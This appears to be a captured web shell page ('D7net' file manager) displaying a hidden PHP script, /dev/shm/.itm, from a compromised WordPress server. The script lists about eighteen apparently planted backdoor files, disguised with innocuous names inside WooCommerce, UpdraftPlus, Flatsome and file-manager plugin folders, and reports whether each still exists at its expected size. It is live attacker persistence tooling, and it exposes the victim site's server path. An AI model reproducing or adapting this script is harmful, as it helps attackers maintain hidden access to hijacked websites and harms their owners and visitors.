D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.itm
back
Copy
<?php $r = '/home/stickain/davidsteele.com'; $x = ["/wp-content/themes/flatsome/inc/builder/core/server/src/Transformers/googlerequest.php"=>"bd@@97030@@942", "/wp-content/plugins/woocommerce/src/Internal/Features/ProductBlockEditor/ProductTemplates/fileupload.php"=>"bd@@111629@@909", "/wp-content/plugins/woocommerce/packages/email-editor/src/Engine/Renderer/ContentRenderer/Preprocessors/interface.blocks.preprocessor.php"=>"bd@@96817@@995", "/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Service/Description/formdatetime.php"=>"bd@@106040@@839", "/wp-content/plugins/woocommerce/vendor/pelago/emogrifier/src/HtmlProcessor/private_key.php"=>"bd@@111678@@966", "/wp-content/plugins/woocommerce/src/Admin/API/Reports/Taxes/Stats/nggallery.php"=>"bd@@111450@@976", "/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phar-io/manifest/src/exceptions/SmartImage.class.php"=>"bd@@106079@@1075", "/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-custom-fields-toggle-field/banner_monthly.php"=>"bd@@106097@@922", "/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Inflection/Wiz6.php"=>"bd@@106123@@845", "/wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Service/textfilter.php"=>"bd@@96149@@839", "/wp-content/plugins/woocommerce/packages/email-editor/src/Engine/Patterns/class.abstract.pattern.php"=>"bd@@111515@@834", "/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/sebastian/object-enumerator/src/ITStatic.php"=>"bd@@106143@@1041", "/wp-content/plugins/widget-1766683433/languages/category.template.1766683434.php"=>"bd@@27553@@741", "/wp-content/plugins/slider_1766683946/assets/css/custom-file-1-1766683947.php"=>"bd@@37290@@874", "/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/phpunit/src/Framework/MockObject/Rule/fitness_goals.php"=>"bd@@71629@@892", "/wp-content/plugins/woocommerce/src/Blocks/Domain/Services/Email/encrypt.inc.php"=>"bd@@111578@@829", "/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Iterator/arabic_mimes.php"=>"bd@@96994@@878", "/wp-content/plugins/file-manager-advanced/application/library/php-parser/vendor/nikic/php-parser/lib/PhpParser/Lexer/admin.admin.php"=>"bd@@95477@@908"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');